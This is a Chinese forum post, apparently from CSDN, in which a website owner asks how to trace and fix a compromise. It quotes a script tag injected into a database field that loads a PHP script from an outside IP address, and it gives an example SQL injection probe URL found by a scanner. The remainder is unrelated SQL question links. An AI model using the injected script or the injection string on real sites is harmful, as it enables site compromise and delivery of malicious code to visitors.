本来是法人代表的字段项目,在信息编辑页出现法人代表:张三<scripT src=http://220.231.180.83:60000/ads_fei1.php?REFERER=http://www.sry4ttft64.com></scripT>被黑之前数据显示应该是
法人代表:张三通过iiscan检查 发现很多sql injection
例如 http://www.xxxxx.com:80/mingonguser/logininfo.asp?UserPassword_hu=hacker&verifycode=1234&Submit=%E6%8F%90%E4%BA%A4&DengLuYongHuMing=88888%00'请问各位大侠 该从那里找漏洞源头,和彻底解决问题呢?
感谢高手门来帮忙
法人代表:张三通过iiscan检查 发现很多sql injection
例如 http://www.xxxxx.com:80/mingonguser/logininfo.asp?UserPassword_hu=hacker&verifycode=1234&Submit=%E6%8F%90%E4%BA%A4&DengLuYongHuMing=88888%00'请问各位大侠 该从那里找漏洞源头,和彻底解决问题呢?
感谢高手门来帮忙
解决方案 »
- 在SQL 2005中有没有办法执行光标所在行及以下的sql语句?
- sql列匹配的问题
- SQL 2008 按时间段划分(每十分钟)统计良率
- 有关于DTS部署到sql2008的疑问
- 这条语句运行后提示语法错误
- 为什么sql server在同一网段里面可以访问,不同网段连不上
- 在多表查询中如何不显示相同列?
- UPDATE 语句的问题!
- 救命啊,有谁知道有没有办法把*.MDF文件恢复数据库
- MSSQL中,有位网友email问我的问题,下面是我给出的方案,大家也来看一看吧.(zhuzhichao)
- declare #A1 CURSOR FOR 与 declare A1 CURSOR FOR 的区别是什么
- 服务器上装好orcale后,用别的计算机的ODBC怎么连接
http://topic.csdn.net/u/20090523/19/72041932-b65c-49c1-ad36-d2c63b38b174.html?96607